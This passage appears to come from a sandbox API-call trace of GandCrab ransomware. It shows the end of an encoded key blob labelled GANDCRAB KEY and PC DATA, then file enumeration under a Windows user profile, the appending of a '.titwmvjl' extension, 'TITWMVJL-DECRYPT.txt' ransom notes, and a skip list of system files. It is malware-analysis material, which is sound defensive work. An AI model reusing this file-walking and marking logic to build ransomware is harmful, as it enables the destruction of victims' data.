50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.150] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0096.151] CloseHandle (hObject=0x2c4) returned 1 [0096.152] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.152] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.152] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1d9)) [0096.152] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.152] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.152] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.152] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock") returned 103 [0096.152] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0096.153] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.153] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.154] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\") returned 79 [0096.154] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*" [0096.154] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503738 [0096.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.154] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.155] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.155] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.155] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.155] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.155] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.155] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock" [0096.155] lstrlenW (lpString=".titwmvjl") returned 9 [0096.155] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock") returned 103 [0096.155] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.155] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 112 [0096.155] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a09d2ca4deb61a.lock") returned 103 [0096.155] lstrlenW (lpString=".lock") returned 5 [0096.155] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.155] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.155] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.156] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.156] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.156] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.156] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.156] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt" [0096.156] lstrlenW (lpString=".titwmvjl") returned 9 [0096.156] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt") returned 99 [0096.156] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.156] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 108 [0096.156] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt") returned 99 [0096.156] lstrlenW (lpString=".txt") returned 4 [0096.156] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.156] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.156] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.157] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.157] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt") returned 99 [0096.157] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\TITWMVJL-DECRYPT.txt") returned 99 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.157] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.157] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.157] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0096.157] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0096.158] CloseHandle (hObject=0x2c4) returned 1 [0096.158] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0096.158] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0096.158] CloseHandle (hObject=0x2bc) returned 1 [0096.158] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.158] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.158] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.159] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt" [0096.159] lstrlenW (lpString=".titwmvjl") returned 9 [0096.159] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 61 [0096.159] VirtualAlloc (lpAddress=0x0, dwSize=0xba, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.159] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 70 [0096.159] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 61 [0096.159] lstrlenW (lpString=".txt") returned 4 [0096.159] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.159] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.159] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.159] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.159] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 61 [0096.159] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 61 [0096.159] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.159] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.159] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.159] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.159] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.159] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.160] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.160] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.160] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.160] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.160] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0096.160] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0096.160] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows" [0096.160] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\" [0096.160] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.160] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.160] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.160] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0096.160] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0096.160] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="Windows Sidebar" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0096.160] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\" [0096.160] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 